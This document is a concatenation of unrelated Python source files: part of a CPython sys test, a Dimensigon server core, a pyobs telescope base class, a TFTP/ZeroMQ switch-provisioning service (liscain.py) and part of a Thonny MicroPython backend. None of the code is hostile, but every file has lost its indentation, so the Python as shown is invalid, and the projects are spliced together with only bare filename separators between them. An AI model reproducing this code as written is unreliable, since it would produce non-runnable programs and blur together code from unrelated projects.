def check_slots(self, obj, base, extra):
expected = sys.getsizeof(base) + struct.calcsize(extra)
if gc.is_tracked(obj) and not gc.is_tracked(base):
expected += self.gc_headsize
self.assertEqual(sys.getsizeof(obj), expected)
def test_slots(self):
# check all subclassable types defined in Objects/ that allow
# non-empty __slots__
check = self.check_slots
class BA(bytearray):
__slots__ = 'a', 'b', 'c'
check(BA(), bytearray(), '3P')
class D(dict):
__slots__ = 'a', 'b', 'c'
check(D(x=[]), {'x': []}, '3P')
class L(list):
__slots__ = 'a', 'b', 'c'
check(L(), [], '3P')
class S(set):
__slots__ = 'a', 'b', 'c'
check(S(), set(), '3P')
class FS(frozenset):
__slots__ = 'a', 'b', 'c'
check(FS(), frozenset(), '3P')
from collections import OrderedDict
class OD(OrderedDict):
__slots__ = 'a', 'b', 'c'
check(OD(x=[]), OrderedDict(x=[]), '3P')
def test_pythontypes(self):
# check all types defined in Python/
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size('P'))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb is not None:
check(tb, size('2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, vsize('') + self.P * len(sys.flags))
def test_asyncgen_hooks(self):
old = sys.get_asyncgen_hooks()
self.assertIsNone(old.firstiter)
self.assertIsNone(old.finalizer)
firstiter = lambda *a: None
sys.set_asyncgen_hooks(firstiter=firstiter)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, None)
self.assertIs(hooks[1], None)
finalizer = lambda *a: None
sys.set_asyncgen_hooks(finalizer=finalizer)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, finalizer)
self.assertIs(hooks[1], finalizer)
sys.set_asyncgen_hooks(*old)
cur = sys.get_asyncgen_hooks()
self.assertIsNone(cur.firstiter)
self.assertIsNone(cur.finalizer)
if __name__ == "__main__":
unittest.main()
|
core.py
|
import logging
import multiprocessing as mp
import os
import time
import typing as t
from gunicorn.app.base import Application
from gunicorn.pidfile import Pidfile
from dimensigon import defaults
from dimensigon.exceptions import DimensigonError
from dimensigon.use_cases.base import TerminateInterrupt
from dimensigon.use_cases.catalog import CatalogManager
from dimensigon.use_cases.cluster import ClusterManager
from dimensigon.use_cases.file_sync import FileSync
# from dimensigon.use_cases.log_sender import LogSender
from dimensigon.use_cases.mptools import MainContext
from dimensigon.use_cases.mptools_events import EventMessage
from dimensigon.use_cases.routing import RouteManager
from dimensigon.utils.typos import Id
from dimensigon.web import DimensigonFlask, create_app, threading
_logger = logging.getLogger("dm")
def _sleep_secs(max_sleep, end_time=999999999999999.9):
# Calculate time left to sleep, no less than 0
return max(0.0, min(end_time - time.time(), max_sleep))
class GunicornApp(Application):
dm = None
def __init__(self, application, options=None):
""" Construct the Application. Default gUnicorn configuration is loaded """
self.application = application
self.options = options or {}
self.process = None
# if port, or host isn't set-- run from os.environments
#
super(GunicornApp, self).__init__()
def init(self, parser, opts, args):
pass
def load_config(self):
# Load up the any app specific configuration
for k, v in self.options.items():
self.cfg.set(k.lower(), v)
def load(self):
return self.application
class Dimensigon:
def __init__(self):
self.flask_app: t.Optional[DimensigonFlask] = None
self.gunicorn: t.Optional[GunicornApp] = None
self.server: t.Optional[mp.Process] = None
self.config = Config(self)
# processes
self.manager = mp.Manager() # shared memory between processes
self.cluster_manager: t.Optional[ClusterManager] = None
self.file_sync: t.Optional[FileSync] = None
self.route_manager: t.Optional[RouteManager] = None
self.catalog_manager: t.Optional[CatalogManager] = None
self.STOP_WAIT_SECS = 90
self.engine = None # set on setup_dm function
self.get_session = None # set on setup_dm function
self._main_ctx = MainContext()
self.server_id: t.Optional[Id] = None
self.pid = None
self.pidfile = None
def create_flask_instance(self):
if self.flask_app is None:
self.flask_app = create_app(self.config.flask_conf)
self.flask_app.dm = self
def create_gunicorn_instance(self):
if self.gunicorn is None:
self.gunicorn = GunicornApp(self.flask_app, self.config.http_conf)
self.gunicorn.dm = self
def set_catalog_manager(self):
if self.catalog_manager is None:
self.catalog_manager = CatalogManager(None, None, None, None, None, self)
def create_processes(self):
self.cluster_manager = self._main_ctx.Proc(ClusterManager, self)
self.cluster_manager.SHUTDOWN_WAIT_SECS = 90
self.route_manager = self._main_ctx.Proc(RouteManager, self)
self.file_sync = self._main_ctx.Proc(FileSync, self)
self.catalog_manager = self._main_ctx.Thread(CatalogManager, self)
# self.log_sender = LogSender(self) # log sender embedded in file_sync process
if self.config.flask:
self.http_server = mp.Process(target=self.flask_app.run, name="Flask server",
kwargs=dict(host='0.0.0.0', port=defaults.DEFAULT_PORT, ssl_context='adhoc'))
else:
self.http_server = mp.Process(target=self.gunicorn.run, name="Gunicorn server")
def bootstrap(self):
self.create_flask_instance()
self.create_gunicorn_instance()
self.create_processes()
def make_first_request(self):
from dimensigon.domain.entities import Server
import dimensigon.web.network as ntwrk
with self.flask_app.app_context():
start = time.time()
while True:
resp = ntwrk.get(Server.get_current(), 'root.home', timeout=1)
if not resp.ok and time.time() - start < 30:
time.sleep(0.5)
else:
break
self._main_ctx.publish_q.safe_put(EventMessage("Listening", source="Dimensigon"))
def start_server(self):
# if hasattr(self.cluster_manager, 'notify_cluster'):
# self.flask_app.before_first_request(self.cluster_manager.notify_cluster)
th = threading.Timer(interval=4, function=self.make_first_request)
th.start()
self.http_server.start()
def start(self):
"""starts dimensigon server"""
_logger.info(f"Starting Dimensigon ({os.getpid()})")
self._main_ctx.init_signals()
self.pid = os.getpid()
pidname = self.config.pidfile
self.pidfile = Pidfile(pidname)
self.pidfile.create(self.pid)
self.bootstrap()
self.flask_app.bootstrap()
# self.cluster_manager.start()
# self.file_sync.start()
# self.log_sender.start() # log sender embedded in file_sync process
self.start_server()
try:
while not self._main_ctx.shutdown_event.is_set():
self._main_ctx.forward_events()
except (TerminateInterrupt, KeyboardInterrupt):
pass
self.shutdown()
def shutdown(self):
_logger.info(f"Shutting down Dimensigon")
self.http_server.terminate()
self.http_server.terminate()
self.http_server.join(90)
if self.http_server.is_alive():
self.http_server.kill()
self._main_ctx.stop()
class Config:
def __init__(self, dm: Dimensigon):
self.dm = dm
# Directory that holds the configuration
self.config_dir: t.Optional[str] = None
# If set, process should upgrade as soon as a neighbour has a higher version
self.auto_upgrade: bool = True
# sets a security layer on top of HTTP
self.security_layer: bool = True
# allow pass through security layer without encrypt packet with header D-Securizer: plain
self.security_layer_antidote: bool = False
# pidfile name
self.pidfile: str = None
# runs the scheduler
self.scheduler: bool = True
# database uri
self.db_uri: t.Optional[str] = None
# http configuration
self.http_conf = {}
# flask configuration
self.flask_conf = {}
# Run configuration (used for elevator to load same configuration)
self.run_config = {}
self.debug: bool = False
self.flask: bool = False
# forces the process to scan on startup
self.force_scan: bool = False
# Run route table, catalog and cluster refresh every minutes
# self.refresh_interval: dt.timedelta = defaults.
def path(self, *path: str) -> str:
"""Generate path to the file within the configuration directory.
"""
if self.config_dir is None:
raise DimensigonError("config_dir is not set")
return os.path.join(self.config_dir, *path)
|
basetelescope.py
|
import threading
from typing import Dict, Any, Tuple, Union, List
from astropy.coordinates import SkyCoord, ICRS, AltAz
import astropy.units as u
import logging
from pyobs.interfaces import ITelescope, IFitsHeaderProvider
from pyobs.modules import Module
from pyobs.mixins import MotionStatusMixin, WeatherAwareMixin, WaitForMotionMixin
from pyobs.modules import timeout
from pyobs.utils.enums import MotionStatus
from pyobs.utils.threads import LockWithAbort
from pyobs.utils.time import Time
log = logging.getLogger(__name__)
class BaseTelescope(WeatherAwareMixin, MotionStatusMixin, WaitForMotionMixin, ITelescope, IFitsHeaderProvider, Module):
"""Base class for telescopes."""
__module__ = 'pyobs.modules.telescope'
def __init__(self, fits_headers: dict = None, min_altitude: float = 10, wait_for_dome: str = None, *args, **kwargs):
"""Initialize a new base telescope.
Args:
fits_headers: Additional FITS headers to send.
min_altitude: Minimal altitude for telescope.
wait_for_dome: Name of dome module to wait for.
"""
Module.__init__(self, *args, **kwargs)
# store
self._fits_headers = fits_headers if fits_headers is not None else {}
self._min_altitude = min_altitude
# some multi-threading stuff
self._lock_moving = threading.Lock()
self._abort_move = threading.Event()
# celestial status
self._celestial_lock = threading.RLock()
self._celestial_headers: Dict[str, Any] = {}
# add thread func
self.add_thread_func(self._celestial, True)
# init mixins
WeatherAwareMixin.__init__(self, *args, **kwargs)
MotionStatusMixin.__init__(self, *args, **kwargs)
WaitForMotionMixin.__init__(self,
wait_for_modules=None if wait_for_dome is None else [wait_for_dome],
wait_for_timeout=60000,
wait_for_states=[MotionStatus.POSITIONED, MotionStatus.TRACKING])
def open(self):
"""Open module."""
Module.open(self)
# open mixins
WeatherAwareMixin.open(self)
MotionStatusMixin.open(self)
def init(self, *args, **kwargs):
"""Initialize telescope.
Raises:
ValueError: If telescope could not be initialized.
"""
raise NotImplementedError
def park(self, *args, **kwargs):
"""Park telescope.
Raises:
ValueError: If telescope could not be parked.
"""
raise NotImplementedError
def _move_radec(self, ra: float, dec: float, abort_event: threading.Event):
"""Actually starts tracking on given coordinates. Must be implemented by derived classes.
Args:
ra: RA in deg to track.
dec: Dec in deg to track.
abort_event: Event that gets triggered when movement should be aborted.
Raises:
Exception: On any error.
"""
raise NotImplementedError
@timeout(1200)
def move_radec(self, ra: float, dec: float, track: bool = True, *args, **kwargs):
"""Starts tracking on given coordinates.
Args:
ra: RA in deg to track.
dec: Dec in deg to track.
track: Whether the device should start tracking on the given coordinates.
Raises:
ValueError: If device could not track.
"""
# check observer
if self.observer is None:
raise ValueError('No observer given.')
# to alt/az
ra_dec = SkyCoord(ra * u.deg, dec * u.deg, frame=ICRS)
alt_az = self.observer.altaz(Time.now(), ra_dec)
# check altitude
if alt_az.alt.degree < self._min_altitude:
raise ValueError('Destination altitude below limit.')
# acquire lock
with LockWithAbort(self._lock_moving, self._abort_move):
# log and event
self._change_motion_status(MotionStatus.SLEWING)
log.info("Moving telescope to RA=%s (%.5f°), Dec=%s (%.5f°)...",
ra_dec.ra.to_string(sep=':', unit=u.hour, pad=True), ra,
ra_dec.dec.to_string(sep=':', unit=u.deg, pad=True), dec)
# track telescope
self._move_radec(ra, dec, abort_event=self._abort_move)
log.info('Reached destination')
# move dome, if exists
self._wait_for_motion(self._abort_move)
# finish slewing
self._change_motion_status(MotionStatus.TRACKING)
# update headers now
threading.Thread(target=self._update_celestial_headers).start()
log.info('Finished moving telescope.')
def _move_altaz(self, alt: float, az: float, abort_event: threading.Event):
"""Actually moves to given coordinates. Must be implemented by derived classes.
Args:
alt: Alt in deg to move to.
az: Az in deg to move to.
abort_event: Event that gets triggered when movement should be aborted.
Raises:
Exception: On error.
"""
raise NotImplementedError
@timeout(1200)
def move_altaz(self, alt: float, az: float, *args, **kwargs):
"""Moves to given coordinates.
Args:
alt: Alt in deg to move to.
az: Az in deg to move to.
Raises:
Exception: On error.
AcquireLockFailed: If current motion could not be aborted.
"""
# check altitude
if alt < self._min_altitude:
raise ValueError('Destination altitude below limit.')
# acquire lock
with LockWithAbort(self._lock_moving, self._abort_move):
# log and event
log.info("Moving telescope to Alt=%.2f°, Az=%.2f°...", alt, az)
self._change_motion_status(MotionStatus.SLEWING)
# move telescope
self._move_altaz(alt, az, abort_event=self._abort_move)
log.info('Reached destination')
# move dome, if exists
self._wait_for_motion(self._abort_move)
# finish slewing
self._change_motion_status(MotionStatus.POSITIONED)
# update headers now
threading.Thread(target=self._update_celestial_headers).start()
log.info('Finished moving telescope.')
def get_fits_headers(self, namespaces: List[str] = None, *args, **kwargs) -> Dict[str, Tuple[Any, str]]:
"""Returns FITS header for the current status of this module.
Args:
namespaces: If given, only return FITS headers for the given namespaces.
Returns:
Dictionary containing FITS headers.
"""
# define base header
hdr: Dict[str, Union[Any, Tuple[Any, str]]] = {}
# positions
try:
ra, dec = self.get_radec()
coords_ra_dec = SkyCoord(ra=ra * u.deg, dec=dec * u.deg, frame=ICRS)
alt, az = self.get_altaz()
coords_alt_az = SkyCoord(alt=alt * u.deg, az=az * u.deg, frame=AltAz)
except Exception as e:
log.warning('Could not fetch telescope position: %s', e)
coords_ra_dec, coords_alt_az = None, None
# set coordinate headers
if coords_ra_dec is not None:
hdr['TEL-RA'] = (float(coords_ra_dec.ra.degree), 'Right ascension of telescope [degrees]')
hdr['TEL-DEC'] = (float(coords_ra_dec.dec.degree), 'Declination of telescope [degrees]')
hdr['CRVAL1'] = hdr['TEL-RA']
hdr['CRVAL2'] = hdr['TEL-DEC']
if coords_alt_az is not None:
hdr['TEL-ALT'] = (float(coords_alt_az.alt.degree), 'Telescope altitude [degrees]')
hdr['TEL-AZ'] = (float(coords_alt_az.az.degree), 'Telescope azimuth [degrees]')
hdr['TEL-ZD'] = (90. - hdr['TEL-ALT'][0], 'Telescope zenith distance [degrees]')
hdr['AIRMASS'] = (float(coords_alt_az.secz.value), 'Airmass of observation start')
# convert to sexagesimal
if coords_ra_dec is not None:
hdr['RA'] = (str(coords_ra_dec.ra.to_string(sep=':', unit=u.hour, pad=True)), 'Right ascension of object')
hdr['DEC'] = (str(coords_ra_dec.dec.to_string(sep=':', unit=u.deg, pad=True)), 'Declination of object')
# site location
if self.observer is not None:
hdr['LATITUDE'] = (float(self.observer.location.lat.degree), 'Latitude of telescope [deg N]')
hdr['LONGITUD'] = (float(self.observer.location.lon.degree), 'Longitude of telescope [deg E]')
hdr['HEIGHT'] = (float(self.observer.location.height.value), 'Altitude of telescope [m]')
# add static fits headers
for key, value in self._fits_headers.items():
hdr[key] = tuple(value)
# add celestial headers
for key, value in self._celestial_headers.items():
hdr[key] = tuple(value)
# finish
return hdr
def _celestial(self):
"""Thread for continuously calculating positions and distances to celestial objects like moon and sun."""
# wait a little
self.closing.wait(10)
# run until closing
while not self.closing.is_set():
# update headers
self._update_celestial_headers()
# sleep a little
self.closing.wait(30)
def _update_celestial_headers(self):
"""Calculate positions and distances to celestial objects like moon and sun."""
# get now
now = Time.now()
# get telescope alt/az
try:
alt, az = self.get_altaz()
tel_altaz = SkyCoord(alt=alt * u.deg, az=az * u.deg, frame='altaz')
except:
alt, az, tel_altaz = None, None, None
# get current moon and sun information
moon_altaz = self.observer.moon_altaz(now)
moon_frac = self.observer.moon_illumination(now)
sun_altaz = self.observer.sun_altaz(now)
# calculate distance to telescope
moon_dist = tel_altaz.separation(moon_altaz) if tel_altaz is not None else None
sun_dist = tel_altaz.separation(sun_altaz) if tel_altaz is not None else None
# store it
with self._celestial_lock:
self._celestial_headers = {
'MOONALT': (float(moon_altaz.alt.degree), 'Lunar altitude'),
'MOONFRAC': (float(moon_frac), 'Fraction of the moon illuminated'),
'MOONDIST': (None if moon_dist is None else float(moon_dist.degree), 'Lunar distance from target'),
'SUNALT': (float(sun_altaz.alt.degree), 'Solar altitude'),
'SUNDIST': (None if sun_dist is None else float(sun_dist.degree), 'Solar Distance from Target')
}
__all__ = ['BaseTelescope']
|
liscain.py
|
import tftpy
import logging
import ipaddress
import threading
import lib.db
import sqlalchemy.orm
import tasks
from sqlalchemy import and_
from devices import remap_to_subclass
from devices.device import Device
from devices.ciscoios import CiscoIOS
from io import StringIO
from lib.config import config
from lib.switchstate import SwitchState
from lib.option82 import Option82
from lib.commander import Commander
import zmq
logging.basicConfig(
level=logging.INFO,
format='%(asctime)-15s %(levelname)-8s %(name)-16s %(message)s'
)
logger = logging.getLogger('lis-cain')
logger.setLevel(logging.INFO)
logging.getLogger('tftpy.TftpServer').setLevel(logging.CRITICAL)
logging.getLogger('tftpy.TftpPacketTypes').setLevel(logging.CRITICAL)
logging.getLogger('tftpy.TftpStates').setLevel(logging.CRITICAL)
commander: Commander = Commander()
commander.start()
option82_controller: lib.option82.Option82 = lib.option82.Option82(commander)
def serve_file(name: str, **kwargs) -> StringIO:
global commander
global option82_controller
remote_address: str = kwargs['raddress']
remote_id: str = 'lc-{:02x}'.format(int(ipaddress.ip_address(remote_address)))
if name in ['network-confg']:
device = None
with lib.db.sql_ses() as ses:
try:
device = ses.query(CiscoIOS).filter(
and_(
CiscoIOS.identifier == remote_id,
CiscoIOS.state != SwitchState.CONFIGURED
)
).one()
except sqlalchemy.orm.exc.NoResultFound:
device = CiscoIOS()
device.initialize(identifier=remote_id, address=remote_address)
ses.add(device)
ses.commit()
ses.refresh(device)
try:
task = tasks.DeviceInitializationTask(device)
if config.get('liscain', 'autoconf_enabled') == 'yes':
task.hook(SwitchState.READY, option82_controller.autoadopt)
commander.enqueue(device, task)
except KeyError as e:
logger.error('init/%s: %s', remote_id, e)
return device.emit_base_config()
else:
logger.debug('%s requested %s, ignoring', remote_id, name)
return StringIO()
def tftp_server():
srv = tftpy.TftpServer(tftproot='c:/tmp', dyn_file_func=serve_file)
srv.listen()
def handle_msg(message):
global option82_controller
cmd = message.get('cmd', None)
if cmd == 'list':
ret = []
with lib.db.sql_ses() as ses:
devices = ses.query(Device).all()
for device in devices:
queued_commands = len(commander.get_queue_list(device))
device_dict = device.as_dict()
device_dict['cqueue'] = queued_commands
ret.append(device_dict)
return ret
elif cmd == 'neighbor-info':
device_id = message.get('id', None)
if device_id is None:
return {'error': 'missing device id'}
with lib.db.sql_ses() as ses:
try:
device = ses.query(Device).filter(Device.id == device_id).one()
remap_to_subclass(device)
return {'info': device.neighbor_info()}
except sqlalchemy.orm.exc.NoResultFound:
return {'error': 'device not found'}
elif cmd == 'delete':
device_id = message.get('id', None)
if device_id is None:
return {'error': 'missing device id'}
with lib.db.sql_ses() as ses:
try:
device = ses.query(Device).filter(Device.id == device_id).one()
ses.delete(device)
ses.commit()
return {'info': 'device deleted'}
except sqlalchemy.orm.exc.NoResultFound:
return {'error': 'device not found'}
elif cmd == 'status':
device_id = message.get('id', None)
if device_id is None:
return {'error': 'missing device id'}
with lib.db.sql_ses() as ses:
try:
device = ses.query(Device).filter(Device.id == device_id).one()
queued_commands = commander.get_queue_list(device)
device_dict = device.as_dict()
device_dict['cqueue'] = len(queued_commands)
device_dict['cqueue_items'] = queued_commands
return device_dict
except sqlalchemy.orm.exc.NoResultFound:
return {'error': 'device not found'}
elif cmd == 'adopt':
device_id = message.get('id', None)
switch_config = message.get('config', None)
identity = message.get('identity', None)
if device_id is None:
return {'error': 'missing device id'}
if config is None:
return {'error': 'missing config'}
if identity is None:
return {'error': 'missing identity'}
device = None
with lib.db.sql_ses() as ses:
try:
device = ses.query(Device).filter(Device.id == device_id).one()
except sqlalchemy.orm.exc.NoResultFound:
return {'error': 'device not found'}
remap_to_subclass(device)
try:
commander.enqueue(
device,
tasks.DeviceConfigurationTask(device, identity=identity, configuration=switch_config)
)
return {'info': 'ok'}
except BaseException as e:
return {'error': str(e)}
elif cmd == 'reinit':
device_id = message.get('id', None)
if device_id is None:
return {'error': 'missing device id'}
device = None
with lib.db.sql_ses() as ses:
try:
device = ses.query(Device).filter(Device.id == device_id).one()
except sqlalchemy.orm.exc.NoResultFound:
return {'error': 'device not found'}
remap_to_subclass(device)
try:
task = tasks.DeviceInitializationTask(device)
if config.get('liscain', 'autoconf_enabled') == 'yes':
task.hook(SwitchState.READY, option82_controller.autoadopt)
commander.enqueue(
device,
task
)
return {'info': 'ok'}
except BaseException as e:
return {'error': str(e)}
elif cmd == 'opt82-info':
upstream_switch_mac = message.get('upstream_switch_mac', None)
upstream_port_info = message.get('upstream_port_info', None)
downstream_switch_name = message.get('downstream_switch_name', None)
if upstream_switch_mac is None:
return {'error': 'missing upstream switch mac'}
if upstream_port_info is None:
return {'error': 'missing upstream port info'}
info = option82_controller.set_association(upstream_switch_mac, upstream_port_info, downstream_switch_name)
return info
elif cmd == 'opt82-list':
opt82_items = []
with lib.db.sql_ses() as ses:
for option82_item in ses.query(lib.option82.Option82Info).all():
opt82_items.append(option82_item.as_dict())
return opt82_items
elif cmd == 'opt82-delete':
item_id = message.get('id', None)
if item_id is None:
return {'error': 'missing opt82 item id'}
with lib.db.sql_ses() as ses:
try:
opt82_item = ses.query(lib.option82.Option82Info).filter(lib.option82.Option82Info.id == item_id).one()
ses.delete(opt82_item)
ses.commit()
except sqlalchemy.orm.exc.NoResultFound:
return {'error': 'option82 item not found'}
return {'info': 'option82 info deleted'}
return {'error': 'unknown command'}
def main():
global option82_controller
lib.db.initialize(config.get('liscain', 'database'))
tftp_task: threading.Thread = threading.Thread(target=tftp_server, daemon=True)
tftp_task.start()
zmq_context: zmq.Context = zmq.Context(10)
zmq_sock: zmq.socket = zmq_context.socket(zmq.REP)
zmq_sock.bind(config.get('liscain', 'command_socket'))
option82_controller_autoadopt: threading.Thread = threading.Thread(
target=option82_controller.autoadopt_mapping_listener,
args=(zmq_context,),
daemon=True
)
option82_controller_autoadopt.start()
while True:
msg: dict = zmq_sock.recv_json()
zmq_sock.send_json(handle_msg(msg))
if __name__ == '__main__':
main()
|
__init__.py
|
import ast
import logging
import io
import os
import platform
import queue
import re
import subprocess
import sys
import textwrap
import threading
import time
import tokenize
import traceback
import webbrowser
from queue import Queue
from textwrap import dedent
from time import sleep
from tkinter import ttk
from thonny.ui_utils import askopenfilename, create_url_label
from typing import Optional
import jedi
import serial.tools.list_ports
from serial import SerialException
from thonny import common, get_runner, get_shell, get_workbench
from thonny.common import (
BackendEvent,
InlineResponse,
MessageFromBackend,
ToplevelCommand,
ToplevelResponse,
)
from thonny.config_ui import ConfigurationPage
from thonny.misc_utils import find_volumes_by_name
from thonny.plugins.backend_config_page import BackendDetailsConfigPage
from thonny.running import BackendProxy
from thonny.ui_utils import SubprocessDialog, create_string_var, show_dialog
EOT = b"\x04"
NORMAL_PROMPT = b">>> "
# first prompt when switching to raw mode (or after soft reboot in raw mode)
FIRST_RAW_PROMPT = b"raw REPL; CTRL-B to exit\r\n>"
RAW_PROMPT = b">"
TIMEOUT = 0.1
EOT_WITH_RAW_PROMPT = "\x04>"
THONNY_START = "<ForThonny>"
THONNY_END = "</ForThonny>"
THONNY_MSG_START = b"\x02"
NEWLINE = "\n"
DEFAULT_WEBREPL_URL = "ws://192.168.4.1:8266/"
# TODO: Current code has some preparations in place to make automatic initial interrupt optional
# It's not so easy, though (initial interrupt also fetches some required info etc)
_AUTOMATIC_INTERRUPT = True
class MicroPythonProxy(BackendProxy):
def __init__(self, clean):
super().__init__(clean)
self._non_serial_msg_queue = Queue()
self._last_toplevel_command = None
self._has_been_idle = False
self._ctrl_c_notice_has_been_removed = False
self._baudrate = 115200
self._reading_cancelled = False
self._welcome_text = ""
self._discarded_bytes = bytearray()
self._builtins_info = self._get_builtins_info()
# TODO: provide default builtins for script completion
self._builtin_modules = []
self.__idle = False
self._connection = self._create_connection()
if self._connection is not None and (clean or _AUTOMATIC_INTERRUPT):
try:
self._interrupt_to_prompt(clean)
self._builtin_modules = self._fetch_builtin_modules()
except TimeoutError:
read_bytes = bytes(
self._discarded_bytes + self._connection._read_buffer
)
self._show_error_connect_again(
"Could not connect to REPL.\n"
+ "Make sure your device has suitable firmware and is not in bootloader mode!\n"
+ "Bytes read: "
+ str(read_bytes)
+ "\nDisconnecting."
)
self.disconnect()
except:
self.disconnect()
raise
self._start_time = time.time()
def send_command(self, cmd):
if isinstance(cmd, ToplevelCommand):
self._last_toplevel_command = cmd
if cmd.name in ["editor_autocomplete", "cd", "dump_api_info", "lsdevice"]:
# Works even without connection to the board
return super().send_command(cmd)
elif self._connection is None:
return "discard"
elif self.idle:
try:
if not self._connection.buffers_are_empty():
discarded = self._connection.read_all()
self._send_error_to_shell(
"Warning: when issuing %r,\nincoming was not emtpy: %r"
% (cmd, discarded)
)
return super().send_command(cmd)
except SerialException as e:
self._handle_serial_exception(e)
return "discard"
else:
return "postpone"
def send_program_input(self, data: str) -> None:
# TODO: what if there is a previous unused data waiting
assert self._connection.outgoing_is_empty()
assert data.endswith("\n")
if not data.endswith("\r\n"):
input_str = data[:-1] + "\r\n"
data = input_str.encode("utf-8")
try:
self._connection.write(data)
# Try to consume the echo
try:
echo = self._connection.read(len(data))
except queue.Empty:
# leave it.
logging.warning("Timeout when reading echo")
return
if echo != data:
# because of autoreload? timing problems? interruption?
# Leave it.
logging.warning("Unexpected echo. Expected %s, got %s" % (data, echo))
self._connection.unread(echo)
except SerialException as e:
self._handle_serial_exception(e)
def fetch_next_message(self):
if not self._non_serial_msg_queue.empty():
msg = self._non_serial_msg_queue.get_nowait()
elif self._connection is not None:
# Provide guidance for Ctrl-C
if time.time() - self._start_time > 0.5:
if not self._has_been_idle:
"""TODO: get_shell().set_notice("Use Ctrl-C to interrupt the program and/or enter the REPL")"""
else:
if not self._ctrl_c_notice_has_been_removed:
"""TODO: get_shell().set_notice(None)"""
self._ctrl_c_notice_has_been_removed = True
# TODO: fetch required info if automatic interrupt is disabled
# get the message
try:
msg = self._read_next_serial_message()
# if msg:
# print("GOT", msg)
except SerialException as e:
self._handle_serial_exception(e)
return None
else:
msg = None
return self.transform_message(msg)
def interrupt(self):
if self._connection is None:
return
try:
self.idle = False
self._connection.reset_output_buffer()
self._connection.write(b"\x03")
# Wait a bit to avoid the situation where part of the prompt will
# be treated as output and whole prompt is not detected.
# (Happened with Calliope)
sleep(0.1)
except SerialException as e:
self._handle_serial_exception(e)
def destroy(self):
self.disconnect()
def disconnect(self):
if self._connection is not None:
try:
self._connection.close()
self._send_text_to_shell(
"\n\nConnection closed.\nSelect Run → Stop/Restart or press Ctrl+F2 to connect again.",
"stdout",
)
except Exception as e:
logging.exception("Problem when closing serial")
self._send_error_to_shell(
"Problem when closing serial connection: " + str(e)
)
self._connection = None
def is_connected(self):
return self._connection is not None
def is_functional(self):
return self.is_connected()
def _create_connection(self):
port = get_workbench().get_option(self.backend_name + ".port")
if port == "webrepl":
return self._create_webrepl_connection()
else:
return self._create_serial_connection(port)
def _create_serial_connection(self, port):
if port is None or port == "None":
self._send_text_to_shell(
'Not connected. Choose "Tools → Options → Backend" to change.', "stdout"
)
return None
if port == "auto":
potential = self._detect_potential_ports()
if len(potential) == 1:
port = potential[0][0]
else:
message = dedent(
"""\
Couldn't find the device automatically.
Check the connection (making sure the device is not in bootloader mode)
or choose "Tools → Options → Backend" to select the port manually."""
)
if len(potential) > 1:
_, descriptions = zip(*potential)
message += "\n\nLikely candidates are:\n * " + "\n * ".join(
descriptions
)
self._show_error_connect_again(message)
return None
try:
return SerialConnection(port, baudrate=self._baudrate)
except SerialException as error:
traceback.print_exc()
message = "Unable to connect to " + port + "\n" + "Error: " + str(error)
# TODO: check if these error codes also apply to Linux and Mac
if error.errno == 13 and platform.system() == "Linux":
# TODO: check if user already has this group
message += "\n\n" + dedent(
"""\
Try adding yourself to the 'dialout' group:
> sudo usermod -a -G dialout <username>
(NB! This needs to be followed by reboot or logging out and logging in again!)"""
)
elif "PermissionError" in message:
message += "\n\n" + dedent(
"""\
If you have serial connection to the device from another program,
then disconnect it there."""
)
elif error.errno == 16:
message += "\n\n" + "Try restarting the device."
self._show_error_connect_again(message)
return None
def _create_webrepl_connection(self):
url = get_workbench().get_option(self.backend_name + ".webrepl_url")
password = get_workbench().get_option(self.backend_name + ".webrepl_password")
print("URL", url)
try:
conn = WebReplConnection(url, password)
except:
e_type, e_value, _ = sys.exc_info()
self._send_error_to_shell(
"Could not connect to "
+ url
+ "\nError: "
+ "\n".join(traceback.format_exception_only(e_type, e_value))
)
return None
conn.read_until([b"WebREPL connected\r\n"])
return conn
def _show_error_connect_again(self, msg):
self._send_error_to_shell(
msg
+ "\n\nCheck the configuration, select Run → Stop/Restart or press Ctrl+F2 to try again."
+ "\n(On some occasions it helps to wait before trying again.)"
)
def _detect_potential_ports(self):
all_ports = list_serial_ports()
"""
for p in all_ports:
print(p.description,
p.device,
None if p.vid is None else hex(p.vid),
None if p.pid is None else hex(p.pid),
)
"""
return [
(p.device, p.description)
for p in all_ports
if (p.vid, p.pid) in self.known_usb_vids_pids
or p.description in self.known_port_descriptions
or ("USB" in p.description and "serial" in p.description.lower())
or "UART" in p.description
or "DAPLink" in p.description
]
@property
def idle(self):
return self.__idle
@idle.setter
def idle(self, value):
if self.__idle != value:
logging.debug("Serial idle %s => %s", self.__idle, value)
self.__idle = value
if value:
self._has_been_idle = True
def _fetch_builtin_modules(self):
assert self.idle
out, err = self._execute_and_get_response("help('modules')")
assert err == b"", "Error was: %r" % err
modules_str = (
out.decode("utf-8")
.replace("Plus any modules on the filesystem", "")
.replace("/__init__", "")
.replace("/", ".")
)
return modules_str.split()
def _fetch_uname(self):
assert self.idle
res = self._execute_and_parse_value(
"import os as __os_; print(repr(tuple(__os_.uname()))); del __os_"
)
return {
"sysname": res[0],
"nodename": res[1],
"release": res[2],
"version": res[3],
"machine": res[4],
}
def _interrupt_to_prompt(self, clean, timeout=8):
assert self._connection is not None
timer = TimeHelper(timeout)
# NB! Sometimes disconnecting and reconnecting (on macOS?)
# too quickly causes anomalies. See CalliopeMiniProxy for more details
for delay in [0.05, 0.5, 2.0, 3.0]:
# Interrupt several times, because with some drivers first interrupts seem to vanish
self._connection.reset_output_buffer()
self._connection.write(b"\x03") # interrupt
self._connection.write(b"\x01") # raw mode
sleep(delay)
self._discarded_bytes += self._connection.read_all()
if self._discarded_bytes.endswith(
FIRST_RAW_PROMPT
) or self._discarded_bytes.endswith(b"\r\n>"):
break
else:
raise TimeoutError("Can't get to raw prompt")
self._welcome_text = self._get_welcome_text_in_raw_mode(timer.time_left)
if clean:
self._clean_environment_during_startup(timer.time_left)
self._finalize_repl()
# report ready
self._non_serial_msg_queue.put(
ToplevelResponse(welcome_text=self._welcome_text.strip())
)
self.idle = True
def _clean_environment_during_startup(self, time_left):
# In MP Ctrl+D doesn't run user code, in CP it does
self._connection.write(b"\x04")
